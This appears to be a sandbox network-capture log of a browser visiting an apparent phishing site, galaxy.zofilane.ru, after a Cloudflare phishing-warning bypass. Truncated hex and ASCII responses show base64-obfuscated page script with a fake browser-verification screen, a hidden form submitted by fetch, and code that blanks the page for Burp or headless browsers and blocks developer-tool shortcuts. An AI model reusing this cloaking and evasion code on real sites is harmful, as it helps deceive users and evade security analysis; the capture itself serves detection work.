                                                            2024-12-14 09:10:38 UTC816OUTGET /cdn-cgi/phish-bypass?atok=SwbvVwxKw1smiZvPhiPMY4WOqvwCFExpxKNssjOvcsQ-1734167414-0.0.1.1-%2FpD0JM2s%2F HTTP/1.1
                                                            Host: galaxy.zofilane.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            Referer: https://galaxy.zofilane.ru/pD0JM2s/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:39 UTC471INHTTP/1.1 301 Moved Permanently
                                                            Date: Sat, 14 Dec 2024 09:10:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: close
                                                            Set-Cookie: __cf_mw_byp=SwbvVwxKw1smiZvPhiPMY4WOqvwCFExpxKNssjOvcsQ-1734167414-0.0.1.1-/pD0JM2s/; Domain=galaxy.zofilane.ru; Path=/; Max-Age=86400
                                                            Cache-Control: private, no-cache
                                                            Location: https://galaxy.zofilane.ru/pD0JM2s/
                                                            Server: cloudflare
                                                            CF-RAY: 8f1d0fdeafaa43e3-EWR
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            2024-12-14 09:10:39 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.449766104.21.67.404436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:39 UTC816OUTGET /pD0JM2s/ HTTP/1.1
                                                            Host: galaxy.zofilane.ru
                                                            Connection: keep-alive
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Referer: https://galaxy.zofilane.ru/pD0JM2s/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: __cf_mw_byp=SwbvVwxKw1smiZvPhiPMY4WOqvwCFExpxKNssjOvcsQ-1734167414-0.0.1.1-/pD0JM2s/
                                                            2024-12-14 09:10:40 UTC1219INHTTP/1.1 200 OK
                                                            Date: Sat, 14 Dec 2024 09:10:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: no-cache, private
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b7cY8HkXFqu1hKoGQa3oJNOzYiP%2FmcIAR60wGyytO8OE6E3W1SV9Z7c2NxfJYv8SN%2B7k5IU7OA9PovUg45W3ZuhFTwsMjZ5%2BrhcQtoldX5aHz0VJsIKD8UFCVDem9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1613&rtt_var=526&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1721&delivery_rate=1725015&cwnd=251&unsent_bytes=0&cid=c334ea35bb9f54ee&ts=398&x=0"
                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Im02L20rNmRvUThmZFpVd05uSzNlaEE9PSIsInZhbHVlIjoibUVDbWpLQlZ1NFRQS3hNakE4cnN1RkQ3V0VsOEFLSHZVRmpzaWYycWZ3eURhQ0VRM3MvQ2NkSU1EenNLWiswZkl6aWxOd1MxblRnSE00WEt3UlZsM1RTRlRJeUVkWHZLYUZteEp6dlZ2SWYwODYvUWo3NWZnYm1yQmM4ZFA0dW4iLCJtYWMiOiJjMDcwN2FjNmY4OGU2Y2JkMGViOTRiNmRjOThhN2IxNTFjMGYyNDEyNmE3NTI4MTM1YzcxOGQ2MmIzOTM0MGQ1IiwidGFnIjoiIn0%3D; expires=Sat, 14-Dec-2024 11:10:39 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                            2024-12-14 09:10:40 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 4a 46 55 7a 67 77 4d 46 4a 5a 5a 32 78 76 55 47 70 61 53 6b 70 31 53 30 35 4f 61 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 65 46 56 6d 4f 47 6c 78 64 55 31 4d 52 47 78 32 52 6e 67 30 53 45 39 75 51 58 5a 36 4e 57 5a 70 4e 47 45 78 56 6a 46 31 59 32 46 55 61 45 77 77 65 57 30 32 54 48 51 72 4e 6d 74 4d 55 45 38 7a 53 6c 67 72 63 55 39 72 4e 6e 70 46 59 6d 31 69 64 47 52 51 64 6c 70 52 4d 56 46 6b 64 45 31 71 63 33 5a 68 4b 30 52 54 4d 57 74 36 65 6e 68 58 54 47 39 74 56 7a 6b 79 59 79 39 69 51 6b 64 47 59 57 4a 33 63 57 64 51 55 30 46 4c 4d 47 49 31 64 56 4a 72 54 56 68 35 59 6b 6b 76 4c 79 39 53 63 58 46 6b 4d 7a 5a 43 62 44 55
                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkJFUzgwMFJZZ2xvUGpaSkp1S05OakE9PSIsInZhbHVlIjoieFVmOGlxdU1MRGx2Rng0SE9uQXZ6NWZpNGExVjF1Y2FUaEwweW02THQrNmtMUE8zSlgrcU9rNnpFYm1idGRQdlpRMVFkdE1qc3ZhK0RTMWt6enhXTG9tVzkyYy9iQkdGYWJ3cWdQU0FLMGI1dVJrTVh5YkkvLy9ScXFkMzZCbDU
                                                            2024-12-14 09:10:40 UTC1369INData Raw: 34 64 63 38 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 74 68 65 20 6b 65 79 20 74 6f 20 68 61 70 70 69 6e 65 73 73 2e 20 48 61 70 70 69 6e 65 73 73 20 69 73 20 74 68 65 20 6b 65 79 20 74 6f 20 73 75 63 63 65 73 73 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 6a 56 44 51 75 65 6d 39 6d 61 57 78 68 62 6d 55 75 63 6e 55 76 63 45 51 77 53 6b 30 79 63 79 38 3d 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53
                                                            Data Ascii: 4dc8... Success is not the key to happiness. Happiness is the key to success. --><script>if(atob("aHR0cHM6Ly9jVDQuem9maWxhbmUucnUvcEQwSk0ycy8=") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPS
                                                            2024-12-14 09:10:40 UTC1369INData Raw: 66 51 30 4b 49 30 64 7a 52 6b 78 54 59 58 6c 5a 63 46 67 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 63 77 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d 64 70 62 69 31 73 5a 57 5a
                                                            Data Ascii: fQ0KI0dzRkxTYXlZcFguY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTcwcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcmdpbi1sZWZ
                                                            2024-12-14 09:10:40 UTC1369INData Raw: 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70
                                                            Data Ascii: CAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMp
                                                            2024-12-14 09:10:40 UTC1369INData Raw: 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 4a 5a 56 52 34 53 31 64 5a 53 32 78 52 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 4a 5a 56 52 34 53 31 64 5a 53 32 78 52 49 43 30 67 65 45 4a 73 54 58 6c 70 63 45 6c 6e 62 53 41 2b 49 46 52 4c 56 56 70 44 55 6b 31 53 64 32 49 67 4a 69 59 67 49 57 35 56 64 57 56 55 59 32 4e 69 5a 31 6f 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 4e 78 56 47 6c 31 63 47 70 50 55 57 49 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 62 6c 56 31 5a 56 52 6a 59 32 4a 6e 57 69 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49
                                                            Data Ascii: VnZ2VyOw0KICAgICAgICBjb25zdCBJZVR4S1dZS2xRID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChJZVR4S1dZS2xRIC0geEJsTXlpcElnbSA+IFRLVVpDUk1Sd2IgJiYgIW5VdWVUY2NiZ1opIHsNCiAgICAgICAgICAgIGNxVGl1cGpPUWIgPSB0cnVlOw0KICAgICAgICAgICAgblV1ZVRjY2JnWiA9IHRydWU7DQogICAgI
                                                            2024-12-14 09:10:40 UTC1369INData Raw: 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 53 47 70 71 61 6d 56 32 63 45 52 53 54 79 49 2b 44 51 70 57 5a 58 4a 70 5a 6e 6c 70 62 6d 63 67 65 57 39 31 63 69 42 69 63 6d 39 33 63 32 56 79 49 48 52 76 49 47 31 68 61 57 35 30 59 57 6c 75 49 48 4e 6c 59 33 56 79 5a 53 42 69 63 6d 39 33 63 32 6c 75 5a 79 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67
                                                            Data Ascii: KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iSGpqamV2cERSTyI+DQpWZXJpZnlpbmcgeW91ciBicm93c2VyIHRvIG1haW50YWluIHNlY3VyZSBicm93c2luZy4NCjwvZGl2Pg0KPC9mb3JtPg
                                                            2024-12-14 09:10:40 UTC1369INData Raw: 64 47 68 76 5a 44 6f 67 49 6c 42 50 55 31 51 69 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 42 69 62 32 52 35 4f 69 42 75 5a 58 63 67 52 6d 39 79 62 55 52 68 64 47 45 6f 64 56 52 56 64 31 6c 45 62 6b 52 4f 5a 43 6b 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6d 70 7a 62 32 34 6f 4b 54 73 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 47 52 68 64 47 45 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 63 33 56 6a 59 32 56 7a 63 79 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68
                                                            Data Ascii: dGhvZDogIlBPU1QiLA0KICAgICAgICBib2R5OiBuZXcgRm9ybURhdGEodVRVd1lEbkROZCkNCiAgICB9KS50aGVuKHJlc3BvbnNlID0+IHsNCiAgICAgICAgcmV0dXJuIHJlc3BvbnNlLmpzb24oKTsNCiAgICB9KS50aGVuKGRhdGEgPT4gew0KICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnc3VjY2Vzcycpew0KICAgICAgICBpZih
                                                            2024-12-14 09:10:40 UTC1369INData Raw: 69 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 62 75 69 6c 74 20 6f 6e 20 73 75 63 63 65 73 73 2e 20 49 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 66 61 69 6c 75 72 65 2e 20 49 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 66 72 75 73 74 72 61 74 69 6f 6e 2e 20 53 6f 6d 65 74 69 6d 65 73 20 69 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 63 61 74 61 73 74 72 6f 70 68 65 2e 20 2a 2f 0d 0a 69 66 28 47 56 62 7a 78 70 73 41 4d 4c 20 3d 3d 20 56 53 75 43 70 4d 41 58 4d 69 29 7b 0d 0a 63 6f 6e 73 74 20 63 78 72 75 63 4a 4b 41 58 73 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74
                                                            Data Ascii: i.hostname.split('.').slice(-2).join('.');/* Success is not built on success. It&#039;s built on failure. It&#039;s built on frustration. Sometimes it&#039;s built on catastrophe. */if(GVbzxpsAML == VSuCpMAXMi){const cxrucJKAXs = window.location.pat
                                                            2024-12-14 09:10:40 UTC1369INData Raw: 32 46 35 57 58 42 59 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 30 64 7a 52 6b 78 54 59 58 6c 5a 63 46 67 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 64 7a 52 6b 78 54 59 58 6c 5a 63 46 67 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 52 33 4e 47 54 46 4e 68 65 56 6c 77
                                                            Data Ascii: 2F5WXBYIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI0dzRkxTYXlZcFggaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI0dzRkxTYXlZcFggaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojR3NGTFNheVlw
                                                            2024-12-14 09:10:40 UTC1369INData Raw: 52 79 61 58 5a 6c 63 69 42 38 66 43 42 33 61 57 35 6b 62 33 63 75 59 32 46 73 62 46 42 6f 59 57 35 30 62 32 30 67 66 48 77 67 64 32 6c 75 5a 47 39 33 4c 6c 39 77 61 47 46 75 64 47 39 74 49 48 78 38 49 47 35 68 64 6d 6c 6e 59 58 52 76 63 69 35 31 63 32 56 79 51 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44
                                                            Data Ascii: RyaXZlciB8fCB3aW5kb3cuY2FsbFBoYW50b20gfHwgd2luZG93Ll9waGFudG9tIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7D


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.449767151.101.66.1374436024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-14 09:10:41 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                            Host: code.jquery.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://galaxy.zofilane.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-12-14 09:10:42 UTC613INHTTP/1.1 200 OK
                                                            Connection: close
                                                            Content-Length: 89501
                                                            Server: nginx
                                                            Content-Type: application/javascript; charset=utf-8
                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                            ETag: "28feccc0-15d9d"
                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                            Access-Control-Allow-Origin: *
                                                            Cross-Origin-Resource-Policy: cross-origin
                                                            Via: 1.1 varnish, 1.1 varnish
                                                            Accept-Ranges: bytes
                                                            Date: Sat, 14 Dec 2024 09:10:42 GMT
                                                            Age: 2688974
                                                            X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740024-EWR
                                                            X-Cache: HIT, HIT
                                                            X-Cache-Hits: 2774, 5
                                                            X-Timer: S1734167442.013843,VS0,VE0
                                                            Vary: Accept-Encoding
                                                            2024-12-14 09:10:42 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                            2024-12-14 09:10:42 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                            Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                            2024-12-14 09:10:42 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                            Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
